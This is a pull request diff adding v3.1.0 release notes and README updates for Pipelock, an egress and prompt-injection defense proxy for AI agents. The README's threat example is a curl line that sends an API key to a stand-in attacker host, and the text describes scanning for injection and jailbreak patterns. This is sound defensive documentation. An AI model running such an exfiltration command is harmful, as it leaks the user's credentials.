### PR TITLE
docs: v3.1.0 release notes, version sweep, and dashboard fixes

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,26 +9,391 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Added
 
-- Enterprise Evidence dashboard now supports a two-tier token model:
-  `--auth-token-file` grants the redacted metadata view, while optional
-  `--raw-token-file` unlocks raw destinations and signed payloads.
-- Enterprise Evidence dashboard access is audited on stderr with role, method,
-  path, session, `session_sha256`, and remote address for each authenticated
-  request.
-
 ### Changed
-
-- Enterprise Evidence dashboard redacts receipt destinations and signed payloads
-  by default before template rendering.
-- Enterprise Evidence dashboard handlers constructed directly from Go now fail
-  closed when both authorization callbacks are nil unless `TrustedOuterAuth` is
-  explicitly set. Embedders that rely on an already-authenticated outer router
-  must opt in to `TrustedOuterAuth`; `pipelock dashboard serve` wires its token
-  auth boundary itself.
 
 ### Fixed
 
 ### Removed
+
+## [3.1.0] - 2026-07-12
+
+### Added
+
+- **Operator dashboard showcase for Pro and Enterprise.** `pipelock dashboard
+  serve` now provides an authorization-filtered operator console with Overview,
+  Evidence, Exemptions, Agents, Budgets, Trust & Keys, Fleet, Workbench, and
+  Incident views. Pro (`agents`) licenses get the agent/evidence surfaces;
+  Enterprise (`fleet`) adds live fleet, workbench, and incident surfaces.
+  Unconnected sources render explicit unknown/empty states instead of implying
+  health. (#885, #888, #923, #946, #966, #991, #951, #960, #968, #970)
+- **Free single-agent evidence serving.** `pipelock evidence serve` serves one
+  selected recorder session as a read-only HTML evidence view without a license
+  and without any route that can enumerate other sessions. Offline single-agent
+  evidence reports are also available through `pipelock evidence view`. (#946,
+  #991)
+- **Dashboard authentication expanded to three modes.** Operator token files,
+  OIDC bearer tokens, and mutual TLS client certificates can each authenticate
+  the dashboard. OIDC validates issuer, audience, and `azp`; mTLS maps verified
+  client-certificate SPKI fingerprints to bounded dashboard permissions. (#973,
+  #982, #985)
+- **Dashboard RBAC, raw-view separation, and access audit.** Dashboard routes
+  now have stable permissions for evidence, raw data, exemptions, agents,
+  budgets, fleet, signed actions, incidents, and trust/keys. Metadata access
+  redacts destinations and signed payloads before template rendering; raw access
+  requires `dashboard:raw:read`. Authenticated requests are audited on stderr
+  with bounded identity and route details. (#967, #978, #991)
+- **Exemption lifecycle and coverage certificates.** Operators can manage
+  exemption owner/reason/expiry/last-match records with `pipelock dashboard
+  exemption ...`, overlay that store in the read-only Exemptions view, generate
+  Pro coverage certificates with `dashboard coverage-cert generate`, and verify
+  certificates offline for free with `dashboard coverage-cert verify` or
+  `evidence verify-cert`. The Exemptions inventory also flags inert or
+  wrong-knob exemptions instead of implying they are active. (#923, #947)
+- **Dashboard durable-state operations.** `dashboard backup`, `dashboard
+  restore`, and `dashboard rebuild-read-model` cover non-reconstructible state,
+  restore validation, disposable index rebuilds, and local alert-delivery
+  health. (#971)
+- **Enterprise SIEM forwarding.** Enterprise builds can use `emit.forwarder` for
+  durable HTTP event delivery with an exact-host destination allowlist,
+  SSRF-resistant connection handling, a bounded spool, replay cursor, health
+  metrics, and at-least-once delivery semantics. CEF syslog output and
+  action-aware export filters are also available. (#920, #972)
+- **Conductor fleet drift guardrails.** Followers report runtime and
+  applied-state status, `conductor fleet status` shows health/drift fields, and
+  `conductor publish` now preflights stale, unseen, failed, or unsupported
+  followers before accepting a bundle. Operators can explicitly override with
+  `--allow-fleet-skew` plus a reason. (#910)
+- **Conductor day-2 operations and recovery commands.** Enterprise fleets now
+  have follower removal, store backup/restore, cross-stream retarget
+  authorization, bounded stream-switch validity, remote-kill replay-state
+  migration, clock-skew inventory, and clearer follower recovery/remediation
+  output including `conductor follower reset-replay-state`. (#827, #828)
+- **Conductor dry-run and decision replay.** `conductor publish`, `kill`,
+  `resume`, and `rollback` support `--dry-run` with the same signing,
+  authorization, and preflight path as real actions but no state mutation.
+  `conductor replay` re-derives signed policy-bundle decisions with an optional
+  state snapshot. (#950, #989)
+- **Bootstrapped Conductor fleets can publish immediately.** `conductor
+  bootstrap` now creates and trusts a policy-bundle signing key, prints the
+  required serve flags, and hashes the loaded typed config so the signed policy
+  hash matches what followers enforce. (#986)
+- **Signed fleet applied-state evidence.** Followers include applied-state in
+  signed audit batches, giving the dashboard and Conductor a verified source of
+  active bundle/version/hash and last-apply outcome instead of relying only on
+  unsigned runtime polls. (#948, #977)
+- **Receipt lifecycle and completeness verification.** Recorder sessions now
+  have signed `session_open`, heartbeat, and `session_close` lifecycle records,
+  durable intent before egress on every mediated transport, and a
+  `pipelock-verifier completeness` command whose best result is LIMITED, never
+  COMPLETE. Receipt failure stats and metrics identify unavailable emitters and
+  required-receipt blocks across proxy transports. (#842, #857, #924, #925,
+  #937, #941, #942, #949, #975)
+- **Exact-byte receipt verification foundation.** New byte-taking verifier APIs
+  preserve and verify the exact JSON bytes stored on disk, rejecting duplicate
+  keys, reordered fields, trailing tokens, null payloads, and signature/version
+  mismatches as groundwork for cross-language strict receipt parity. (#915)
+- **Evidence-health observability and honest scorecards.** Evidence health now
+  exposes sequence-gap, chain-head-age, anchor-lag, durability, self-audit, and
+  evidence-assurance metrics; dashboard/verifier scorecards report Authentic,
+  Untampered, Anchored, and Completeness as separate facts. Evidence displays
+  annotate bidirectional, zero-width, control, confusable, mixed-script, and
+  punycode anomalies without changing signed bytes. (#930, #931)
+- **Receipt verifier parity across languages.** Go, Rust, TypeScript, Python,
+  and the wasm verifier now agree on bound-genesis session-control records,
+  rotated chains, post-close records, and strict signed-field validation. (#926,
+  #929, #935, #952, #963)
+- **Receipt anchoring controls.** `pipelock anchor receipts` can write local
+  anchor bundles, submit Rekor checkpoint anchors, verify Rekor inclusion
+  proofs, pin Rekor log keys through `pipelock-verifier independent`, and use
+  algorithm-aware Rekor hashedrekord signing/verification, including SHA-512 for
+  Ed25519 Rekor v1 logs. (#858, #861, #866, #979, #987, #992)
+- **Operator read commands.** `pipelock presets`, `pipelock quickstart`,
+  `pipelock status`, and `pipelock explain event` give operators preset
+  inventory, setup guidance, local posture summaries, and audit-log decision
+  explanations without mutating runtime state. All seven built-in presets are
+  selectable with `--preset`, `explain` covers command/tool/file hook blocks,
+  and operator remediation guidance now comes from one audience-separated
+  table. (#874, #875, #877, #921, #922)
+- **MCP and A2A policy controls are broader.** MCP tool policy can match
+  structural argument type, numeric range, length, and value constraints; taint
+  trust can be scoped by MCP server name; and A2A methods now flow through the
+  same denial-of-wallet, chain-detection, session-binding, taint, contract, and
+  request-body gates as tool calls. (#865, #881, #900, #903, #909)
+- **Deferred-action operator steering.** Held MCP actions have cascade-depth
+  limits, pending-ancestor linkage, verifier linting for cascade metadata, and
+  operator-only API/CLI commands to list, approve, or deny held actions without
+  exposing raw request bytes. (#887, #905)
+- **Contained launch path.** `pipelock contain run -- ...` verifies the
+  installed containment boundary, emits signed posture evidence, and launches a
+  registered tool as the contained agent only after preflight succeeds. (#846)
+- **Public playground verification tooling.** The playground demo gained
+  per-visitor Fly Machine sessions, broker-side human/abuse gates, browser WASM
+  verification, OS-specific verify kits, signed receipts in bundles, retained
+  download retry, warm-pool hardening, demo replay scenarios, and public-serving
+  fixes for the verifier assets. (#826, #831, #832, #834, #837, #838, #839,
+  #883, #896)
+- **Endpoint-specific query-entropy exemptions.** Operators can suppress
+  query-value entropy for an exact HTTPS scheme/host/path/parameter tuple while
+  keeping DLP, SSRF, adjacent parameters, path/subdomain entropy, rate limits,
+  and data budgets active. (#916)
+- **Official rule bundles on source installs.** Source and `go install` builds
+  can verify official signed bundles using the compiled public rules keyring,
+  and development-version strings no longer break bundle loading. (#955, #983)
+- **Example coverage.** New verified examples cover Cursor integration,
+  WebSocket proxying, canary tokens, Docker Compose proxy deployment, and
+  offline-verifiable Make It Leak replay-capture scenarios. (#896, #927, #932,
+  #933, #945)
+
+### Changed
+
+- **Reload protects live bundle coverage in every mode.** Hot reloads now keep
+  the previous config when a bundle-resolution error would drop currently live
+  DLP, response, or MCP tool-poison rules, even outside strict mode. (#988)
+- **Required security reloads fail closed on downgrades.** Hot reload now
+  rejects warning-level downgrades when strict mode or explicit required
+  security contracts are active, including required receipts, MCP binary
+  integrity/provenance, inbound mediation verification, and behavioral-baseline
+  action weakening. (#860, #879)
+- **Policy hashes are bound to the deciding config snapshot.** Receipts now
+  stamp the policy hash from the request's resolved config snapshot across
+  fetch, forward, CONNECT, TLS intercept, reverse, WebSocket, and MCP surfaces,
+  so a concurrent hot reload cannot relabel an in-flight decision. (#961)
+- **Receipt verification is stricter.** Signed v1 receipt objects reject
+  unknown fields recursively; only the unsigned top-level `ext` bag remains as
+  a forward-compatible advisory surface. Recorder readers distinguish
+  receipt-chain mode from whole-recorder mode. (#963)
+- **Containment wording is more honest.** Point-in-time containment evidence is
+  reported as `kernel_observed` instead of `kernel_enforced`; the stronger
+  label is reserved for a future continuously enforced kernel gate. (#938)
+- **Media passthrough and exempt-domain blind spots are labeled honestly.**
+  Unscanned reverse-proxy media streams now record
+  `media_passthrough_unscanned`, and `response_scanning.exempt_domains` emits
+  warnings/metrics when it creates a full-trust unscanned path. (#936, #962)
+- **Crash reporting is opt-in and minimized.** Shipped presets no longer enable
+  crash reporting by default; enabled reports are rebuilt through a small
+  allowlist and unsafe payloads fail closed. (#917, #918)
+- **DLP and response pattern sources are centralized.** Built-in DLP patterns
+  now have one generated source of truth for defaults, core floors, preset YAML,
+  quickstart redaction mirrors, and parity tests. Dotted-token patterns use
+  case-sensitive structural anchors for Discord, SendGrid, and JWT forms to cut
+  prose false positives while preserving valid-token detection. (#836, #919)
+- **Scanner false positives were narrowed without lowering the safety floor.**
+  Credential-path, auth-material, and markdown-link exfiltration detectors now
+  require stronger handoff/exfiltration intent for documentation-prone shapes
+  while preserving high-signal secret-file and collection-link attacks.
+  Documentation-example credential exemptions are whole-token and
+  context-bound, and inbound AWS ID OCR/prose filtering is limited to
+  low-confidence inbound matches. (#878, #902, #906, #911, #912, #981)
+- **Scanner coverage was expanded across encoded and fragmented inputs.**
+  Encoded DLP candidates normalize common separators before bounded decode,
+  invisible-split keywords and seed phrases are reassembled across config and
+  decoded response passes, embedded URLs are URL-scanned from text, A2A card
+  URLs and file-part URIs enter SSRF policy, and confusable MCP tool-name
+  collisions are detected. (#847, #882, #891)
+- **A2A and MCP enforcement identity are clearer.** A2A params receive redaction
+  parity with MCP `tools/call`, A2A method inventory is separated from MCP tool
+  inventory, and reserved-prefix MCP tool names are namespaced before budget and
+  chain enforcement. MCP provenance and drift hashing now cover full tool
+  objects, and MCP `resources/read` HTTP(S) URIs are URL-policy scanned with
+  block-reason attribution. (#853, #854, #900, #903, #909, #934, #976)
+- **Taint ask/local-gateway behavior is documented and safer.** Taint
+  `permissive` mode is observe-only, terminal approval wiring avoids consuming
+  MCP stdio protocol input, and local model gateway tuning guidance is clearer.
+  Fail-safe taint classification can treat low-confidence reads as protected,
+  and trust can be scoped by server name. (#865, #876, #879, #965)
+- **Baseline profile integrity is stronger.** Baseline integrity state uses a
+  cross-process high-water lock and keyed digest, covers pending ratification
+  profiles, and reads profile/manifest/key/high-water files with no-follow
+  protections. Runtime baseline enforcement now applies across HTTP, MCP, and
+  A2A identities, learns only executed tool calls, rejects unreadable/corrupt
+  enforcing profiles, and fails closed on signed-manifest tamper or rollback.
+  (#876, #879, #880, #892, #894, #897, #914, #975, #980)
+- **Response scanning treats exemptions and streaming more explicitly.**
+  Response suppressions are applied inside each scan cascade pass so an early
+  suppressed match cannot mask a later decoded finding; generic SSE scans keep a
+  bounded rolling tail across events; joined SSE `data:` payloads have a
+  cumulative cap; and over-cap size-exempt responses are scanned with bounded
+  per-response and in-flight memory before delivery. (#844, #848, #850, #899)
+- **Audit and event emission have stronger operator visibility.** Operational
+  lifecycle/security events reach configured external sinks with explicit
+  severities, syslog delivery uses a bounded async queue, and slow or full sinks
+  fail fast with drain-on-close behavior instead of blocking callers. (#843,
+  #845)
+- **Git and installer surfaces are stricter.** `pipelock git scan-diff` rejects
+  malformed, unsupported, binary, or unattributed diffs; generated hooks avoid
+  external diff-driver/textconv blind spots; rules commands use secure config
+  discovery; and installers embed resolved config paths for Claude, Cursor,
+  Codex, JetBrains, and git hooks. (#872, #873)
+- **Release and CI hygiene improved.** Linux race tests are sharded with
+  package-level progress, dependency downloads are retried, failed Go test
+  details are preserved, Go toolchains and dependencies were refreshed, and
+  release-note grouping/filtering was improved. Release prep, docs accuracy,
+  matched AGENTS/CLAUDE guidance, CI review triggers, OSV Renovate fast-tracks,
+  config-consumption/test-parity guardrails, and the liveproof test harness were
+  also tightened. (#822, #829, #830, #833, #835, #862, #863, #864, #867, #886,
+  #898, #901, #907, #908, #928, #939, #944, #953, #954, #956, #957, #958,
+  #959, #990)
+
+### Fixed
+
+- **MCP input envelopes and JSON parser differentials fail closed.** MCP
+  mediation now rejects non-object or null params that cannot be safely stamped,
+  normalizes malformed `_meta`, preserves recovered request IDs on duplicate-key
+  blocks, keeps literal `<`, `>`, and `&` bytes when rewriting, and rejects
+  duplicate JSON keys across MCP, A2A, and playground proof artifacts. (#840,
+  #841, #855, #856)
+- **MCP binary integrity blocks by default when enabled.** With
+  `mcp_binary_integrity.enabled: true`, an omitted or empty action now blocks on
+  missing, unreadable, incomplete, or mismatched manifests unless the operator
+  explicitly sets `action: warn`. (#849)
+- **MCP audit and drift gaps are closed.** Split DLP across A2A task-update
+  events blocks before the completing event is forwarded, blocked MCP tool
+  drift no longer updates the trusted baseline, and required-receipt audit gaps
+  fail closed without leaking mediation envelopes. (#851, #852, #895)
+- **Containment drift proofs are stricter.** nftables verification is
+  order-aware, rejects unexpected accept rules before the agent catch-all drop,
+  validates live rules against current proxy/agent/operator UIDs, and repairs
+  stale or unsafe live rules during install. (#859, #868)
+- **Response scanning parity and false-positive fixes landed.** Reverse proxy
+  honors size-exempt response parity, verified PNG/JPEG data URLs avoid binary
+  DLP false positives while preserving embedded-secret detection, multipart
+  uploads with undecodable or unsupported content-transfer encodings block
+  fail-closed, and the immutable core response floor mirrors decoded
+  normalization/suppression ordering. (#869, #870, #884, #893)
+- **Deferred session-less holds no longer cross-link.** A held action without a
+  stable session ID is treated as an independent root, so denying one
+  session-less hold cannot cascade-block an unrelated one or mint false parent
+  receipt metadata. (#889)
+- **Dashboard raw evidence access is separated and audited.** Evidence views
+  are redacted by default; raw destinations and signed payloads require a
+  separate raw token, identical metadata/raw token files are rejected, and
+  authenticated access is audited by role, path, session, and remote address.
+  (#890)
+- **Conductor audit and enrollment edge cases fail closed.** Audit queries
+  reject empty or whitespace-only scopes before store access, enrollment tokens
+  are single-use under concurrent consumption, and rollback output exposes the
+  derived counter for operator correlation. (#904)
+- **Baseline diagnostics are safe to log.** Baseline integrity failure logs
+  sanitize control characters, Unicode line separators, and ANSI/control runes
+  in agent-influenced fields, while preserving fingerprinted diagnostics for
+  operator correlation. (#940, #943)
+- **Evidence and Rekor reads are bounded.** Recorder resume enumeration, tail
+  reads, file hashing, envelope-emitter zero-max reads, and raw receipt-chain
+  fallbacks now fail closed above size or entry caps; Rekor hashedrekord
+  submission and independent verification use the artifact digest expected by
+  Rekor v1 Ed25519 verification. (#992)
+- **Coverage-certificate trust pinning now fails closed.** Verification returns
+  non-zero when a trusted-signer set is supplied and the certificate signer is
+  not in that set. (#984)
+- **Rekor anchoring no longer has an undeclared public default.** Empty Rekor
+  URLs fail closed; operators must name the log and acknowledge remote
+  submission. (#983)
+- **Signed checkpoint configuration now fails closed.** A persisting recorder
+  with `sign_checkpoints: true` and no signing key refuses to start instead of
+  writing checkpoints that later fail verification. (#983)
+- **Rule-bundle re-resolution is idempotent.** Hot reload and Conductor policy
+  apply no longer re-append bundle patterns or falsely trip strict-mode pattern
+  downgrade checks. (#983)
+- **Policy bundles reject ambiguous local companion files.** Bundle publishing
+  rejects relative local companion-file fields that would make the signed hash
+  depend on the publisher's working directory. (#986)
+- **Deferred-action depth denials are journaled.** Cascade-depth rejections now
+  write terminal `deferred-actions.jsonl` entries, so journal-only audits see
+  the same denial recorded in the signed receipt. (#913)
+- **Dashboard mTLS can be the sole authenticator.** `dashboard serve
+  --require-client-cert` no longer requires a token or OIDC issuer, and the
+  dashboard Workbench command templates use existing flags. (#982)
+- **Dashboard storage and request reads are bounded.** Dashboard stores now
+  strict-decode, reject unsafe paths/duplicates, use no-follow bounded opens,
+  and fail closed when embedded without an explicit auth boundary. (#978)
+- **Conductor rollback and emergency-control paths fail closed on partial
+  failure.** Rollback authorization is recorded before head application,
+  concurrent publish supersession is rejected, and unsigned/ambiguous fleet
+  provenance is not labeled verified. (#977)
+- **Windows baseline reads work again.** Windows baseline profile reads now open
+  normal regular files while still rejecting final-component symlinks/reparse
+  points and preserving shared path checks. (#980)
+- **Receipt completeness gaps close across transports.** Required receipt
+  emission failures now block before egress on MCP, proxy, reverse, and
+  TLS-intercept paths, and replacement block/gap receipts keep denied actions
+  auditable. (#925, #937, #941, #942, #949, #975)
+
+### Removed
+
+- **The AARM compliance dashboard page was removed.** The page is withheld until
+  a version-aware, multi-framework redesign is ready; the earlier compliance
+  console slice is not part of the final v3.1.0 operator surface. (#969, #991)
+
+### Breaking Changes / Upgrade Notes
+
+- **mTLS dashboard role maps must remove `dashboard:compliance:read`.** The
+  compliance page and permission were removed in #991. `dashboard serve` fails
+  closed at startup with `unknown permission "dashboard:compliance:read"` if a
+  `--client-cert-role-map` still lists it.
+- **Containment/evidence grade parsers must update
+  `kernel_enforced` -> `kernel_observed`.** The emitted verifier/dashboard grade
+  now describes point-in-time observed containment, not continuous kernel
+  enforcement. Anything matching the old string must accept the new one. (#938)
+- **Receipts with unknown signed fields are now invalid.** v1 signed receipt
+  objects, action records, session-control payloads, and nested signed payloads
+  reject unknown fields. Older verifiers may have accepted-and-ignored those
+  fields; v3.1.0 verifiers reject them. Use the unsigned top-level `ext` bag
+  only for advisory forward-compatible data. (#963)
+- **Recorder chain verification has two explicit modes.** Receipt-chain mode
+  certifies a valid receipt subsequence and skips only a fixed allowlist of
+  operational entry types; whole-recorder mode validates the full recorder
+  hash-chain and rejects unknown entry types. A file with unknown recorder entry
+  types that older tooling silently skipped may now fail closed. (#963)
+- **Rekor submission is explicit.** Empty Rekor URLs no longer default to a
+  public transparency log; configure `--rekor-url`/`RekorLog.URL` and pass
+  `--yes-send-to-remote-log` for remote anchoring. (#983)
+- **Rekor hashedrekord signing is algorithm-aware.** Ed25519 Rekor v1
+  submissions and independent verification use the SHA-512 artifact digest that
+  Rekor verifies; legacy SHA-256 Ed25519 hashedrekord bodies now fail closed.
+  Unsupported algorithms still fail before submission. (#987, #992)
+- **Hot reload may reject bundle-resolution errors in balanced/audit mode.** A
+  reload that would drop currently live bundle-sourced detections is now refused
+  and the previous config stays active. This is intentional fail-closed
+  behavior; fix the bundle/signature/lock/min-version problem or remove the
+  currently-live dependency deliberately. (#988)
+- **Required security reload downgrades may now be refused.** Reloads that
+  weaken required receipts, MCP binary integrity/provenance, inbound mediation
+  verification, or behavioral-baseline enforcement are rejected when those
+  contracts are active. (#860, #879)
+- **Enabled MCP binary integrity now blocks by default.** Operators using
+  `mcp_binary_integrity.enabled: true` without an explicit action must set
+  `action: warn` to preserve a warning-only rollout; otherwise manifest load,
+  hash, and signature failures block subprocess launch. (#849)
+- **Behavioral baseline enforcement fails closed on unsafe persisted state.**
+  Enforcing baseline profiles now refuse unreadable, corrupt, tampered,
+  downgraded, rolled-back, or invalid-action state at startup/reload instead of
+  silently dropping enforcement. (#876, #892, #897)
+- **Over-cap size-exempt responses are scanned or blocked.** Hosts listed in
+  `response_scanning.size_exempt_domains` no longer get an unscanned over-cap
+  passthrough path; bodies are scanned within the new bounded memory caps or
+  fail closed. Use `response_scanning.unscannable_passthrough` only for
+  explicitly reasoned, expiring opaque-response exceptions. (#899)
+- **Generated defaults and selected security gates are stricter.** Regenerated
+  configs no longer include Slack, Discord, or Telegram in the default
+  `api_allowlist`; `PIPELOCK_LICENSE_REQUIRE_INTERMEDIATE` deployments with an
+  intermediate must configure a CRL; and cross-stream Conductor retargeting now
+  requires bounded stream-switch authorization. (#827)
+- **Git diff scanning rejects more unverifiable input.** Automation that feeds
+  malformed, unsupported, binary, externally transformed, or unattributed diffs
+  to `pipelock git scan-diff` should expect a fail-closed rejection instead of a
+  best-effort scan. (#872)
+- **Coverage-certificate verifier exit codes are stricter.** With
+  `--trusted-signer`, a certificate signed by an untrusted key now exits
+  non-zero instead of warning and exiting 0. Automation should treat that as a
+  failed trust decision. (#984)
+- **Persisting signed recorders require a signing key.** If `flight_recorder.dir`
+  is set and `sign_checkpoints: true`, startup now fails unless
+  `flight_recorder.signing_key_path` is configured. Set the key or explicitly
+  set `sign_checkpoints: false` for unsigned hash-chain-only evidence. (#983)
+- **Baseline integrity high-water state changed format.** An existing high-water
+  file from the prior digest format is treated as invalid under enforcing
+  baseline deviation actions until the operator runs the documented baseline
+  reset/wipe procedure. (#914)
 
 ## [3.0.0] - 2026-06-23
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -331,7 +331,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   a version-aware, multi-framework redesign is ready; the earlier compliance
   console slice is not part of the final v3.1.0 operator surface. (#969, #991)
 
-### Breaking Changes / Upgrade Notes
+### ⚠️ Breaking Changes / Upgrade Notes
+
+Every change in this section fails closed: it blocks or tightens, and none of them
+open a hole. Review before upgrading.
 
 - **mTLS dashboard role maps must remove `dashboard:compliance:read`.** The
   compliance page and permission were removed in #991. `dashboard serve` fails

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -317,6 +317,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   emission failures now block before egress on MCP, proxy, reverse, and
   TLS-intercept paths, and replacement block/gap receipts keep denied actions
   auditable. (#925, #937, #941, #942, #949, #975)
+- **Dashboard backup preserves legal-hold state.** `dashboard backup` and
+  `restore` now include the legal-hold store and capture every store by its
+  configured path, so a backup and restore cycle no longer drops legal holds;
+  restore fails closed when a backup carries legal holds and no legal-hold store
+  is configured, rather than dropping them.
+- **The operator dashboard serves the product brand favicon** instead of a
+  generic browser icon, embedded so it needs no external asset route.
 
 ### Removed
 

--- a/README.md
+++ b/README.md
@@ -25,7 +25,7 @@
 
 **The receipt proves a content-aware decision — not a blind one.** A signed receipt is only as good as what the signature is over: a decision made without inspecting the content is a notarized blind spot. Pipelock signs each receipt over a content-aware decision, from a mediator outside the agent process and outside its credentials, so a verifier can reason about the traffic that actually crossed the Pipelock boundary without trusting the agent or the vendor.
 
-**Covers MCP security, agent egress security, DLP for AI agents, and prompt injection defense.** Pipelock acts as an agent egress proxy for wrapped outbound HTTP, WebSocket, and MCP traffic, with bidirectional MCP scanning, 65 credential patterns, and 29 injection patterns with 6-pass normalization.
+**Covers MCP security, agent egress security, DLP for AI agents, and prompt injection defense.** Pipelock acts as an agent egress proxy for wrapped outbound HTTP, WebSocket, and MCP traffic, with bidirectional MCP scanning, 65 credential patterns, and 32 injection patterns with 6-pass normalization.
 
 **Works with:** Claude Code · OpenAI Codex · Cline · OpenCode · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph
 
@@ -33,10 +33,10 @@
 
 ## The Problem
 
-Your AI agent has `$ANTHROPIC_API_KEY` in its environment, plus shell access. One request is all it takes:
+Your AI agent has `$PROVIDER_API_KEY` in its environment, plus shell access. One request is all it takes:
 
 ```bash
-curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching
+curl "https://evil.com/steal?key=$PROVIDER_API_KEY"   # game over, unless pipelock is watching
 ```
 
 Every machine action your agent takes (HTTP requests, tool calls, browser sessions) should cross a boundary between your secrets and the open internet. Pipelock sits at that boundary when the agent is routed through its proxy, MCP wrapper, or containment topology. It scans mediated outbound and inbound requests, blocks exfiltration and injection, sandboxes the agent process where configured, and generates signed evidence of what happened.
@@ -77,8 +77,8 @@ brew install luckyPipewrench/tap/pipelock
 <summary>Verify release integrity (SLSA provenance + SBOM)</summary>
 
 ```bash
-gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench
-gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench
+gh attestation verify pipelock_3.1.0_linux_amd64.tar.gz --owner luckyPipewrench
+gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:v3.1.0 --owner luckyPipewrench
 ```
 
 </details>
@@ -107,7 +107,7 @@ pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server
 
 ### Response Scanning
 
-Fetched content is scanned for prompt injection and state/control poisoning before reaching the agent. A 6-pass normalization pipeline catches zero-width character evasion, homoglyph substitution, leetspeak encoding, and base64-wrapped payloads. 29 built-in patterns cover jailbreak phrases, instruction manipulation, credential solicitation, memory persistence, preference poisoning, covert action directives, model instruction boundaries, and CJK-language instruction overrides. Actions: `block`, `strip`, `warn`, or `ask` (human-in-the-loop terminal approval).
+Fetched content is scanned for prompt injection and state/control poisoning before reaching the agent. A 6-pass normalization pipeline catches zero-width character evasion, homoglyph substitution, leetspeak encoding, and base64-wrapped payloads. 32 built-in patterns cover jailbreak phrases, instruction manipulation, credential solicitation, memory persistence, preference poisoning, covert action directives, model instruction boundaries, and CJK-language instruction overrides. Actions: `block`, `strip`, `warn`, or `ask` (human-in-the-loop terminal approval).
 
 `text/event-stream` responses (OpenAI chat completions, Anthropic messages, OpenAI-compatible gateways, MCP HTTP/SSE) stream through with per-event and rolling cross-event DLP and injection scanning so token-by-token LLM chat UX is preserved while body scanning stays on. Clean events flush immediately; a detection terminates the stream fail-closed. Compressed SSE streams are rejected since compressed bytes evade regex matching. See [SSE streaming guide](docs/guides/sse-streaming.md).
 
@@ -218,13 +218,15 @@ Synthetic secrets injected into the agent's environment. If pipelock detects a c
 | **Finding Suppression** | Silence known false positives via config rules or inline `pipelock:ignore` comments |
 | **Multi-Agent Support** | Agent identification via `X-Pipelock-Agent` header for per-agent filtering |
 | **Fleet Monitoring** | Per-instance Prometheus metrics + ready-to-import [Grafana dashboard](configs/grafana-dashboard.json). (Free; monitors a single instance — distinct from the Conductor fleet control plane below.) |
-| **Conductor — fleet control plane** (v2.7, Enterprise) | The Enterprise control plane for a fleet of Pipelock instances: signed policy-bundle distribution to followers, a signed-evidence audit sink (`pipelock fleet-sink`) namespaced per org/fleet/instance, and fleet-wide enrollment, remote kill, and policy rollback over mTLS/SPIFFE. Followers enforce locally and stay fail-closed; Conductor holds no agent secrets. Gated by the `fleet` license feature, fail-closed. See the [Conductor guide](docs/guides/conductor.md). |
+| **Operator Dashboard** (v3.1, Pro/Enterprise) | `pipelock dashboard serve` gives operators read-only Overview, Evidence, Exemptions, Agents, Budgets, Trust & Keys, Fleet, Workbench, and Incident views with token, OIDC, or mTLS authentication, bounded RBAC permissions, redacted metadata views, raw-view elevation, backup/restore, exemption lifecycle records, and coverage certificates. See [`docs/cli/dashboard.md`](docs/cli/dashboard.md). |
+| **Free Evidence Viewer** (v3.1) | `pipelock evidence serve` serves one selected recorder session as a read-only HTML report without a license and without cross-agent enumeration. `pipelock evidence verify-cert` verifies Pro-issued coverage certificates offline. |
+| **Conductor — fleet control plane** (v2.7, Enterprise) | The Enterprise control plane for a fleet of Pipelock instances: signed policy-bundle distribution to followers, a signed-evidence audit sink (`pipelock fleet-sink`) namespaced per org/fleet/instance, and fleet-wide enrollment, remote kill, policy rollback, dry-run, decision replay, and runtime/apply-state drift preflight over mTLS/SPIFFE. Followers enforce locally and stay fail-closed; Conductor holds no agent secrets. Gated by the `fleet` license feature, fail-closed. See the [Conductor guide](docs/guides/conductor.md). |
 | **A2A Scanning** | Agent Card poisoning detection, card drift monitoring, session smuggling prevention for Google's Agent-to-Agent protocol |
 | **Behavioral Baseline** | Profile-then-lock for MCP tool behavior. Learns normal patterns during a window, exposes `pipelock baseline list/show/ratify/forget` for operator approval and relearning, and flags deviations after ratification. See [`docs/cli/baseline.md`](docs/cli/baseline.md). |
 | **Denial-of-Wallet** | Per-agent budgets for retries, fan-out, and concurrent tool calls. Catches loop storms and amplification attacks. |
 | **Taint Escalation** | Exposure-based policy escalation across MCP + task boundaries. Sessions that recently observed untrusted content get elevated scanning on protected operations until trust is explicitly restored. |
 | **Mediation Envelope** | RFC 8941 sideband metadata on forwarded HTTP requests and MCP `_meta`, carrying action type, verdict, actor identity, policy hash, taint context, and receipt correlation ID. v2.4 adds inbound verification with replay protection, SPIFFE actor format, and an RFC 9421 well-known signing-key directory at `/.well-known/http-message-signatures-directory`. See [federation guide](docs/guides/federation.md). |
-| **Receipt Conformance** | Cross-implementation receipt verification suite (`sdk/conformance/`) plus first-party Go, TypeScript, Rust, and Python verifier surfaces, so receipts can be verified outside the Go implementation. `EvidenceReceipt v2` uses RFC 8785/JCS canonicalization; the Go verifier verifies individual v2 receipts and chains, and the non-Go verifiers accept spanned `proxy_decision_with_spans` v2 receipts with pinned-key Ed25519 verification and strict unknown-field rejection. AARP/SVID appraisal remains an offline verifier profile, not runtime identity enforcement. |
+| **Receipt Conformance** | Cross-implementation receipt verification suite (`sdk/conformance/`) plus first-party Go, TypeScript, Rust, Python, and wasm verifier surfaces, so receipts can be verified outside the Go implementation. `EvidenceReceipt v2` uses RFC 8785/JCS canonicalization; verifiers enforce strict unknown-field rejection, bound-genesis session-control records, rotated-chain parity, and pinned-key Ed25519 verification. AARP/SVID appraisal remains an offline verifier profile, not runtime identity enforcement. |
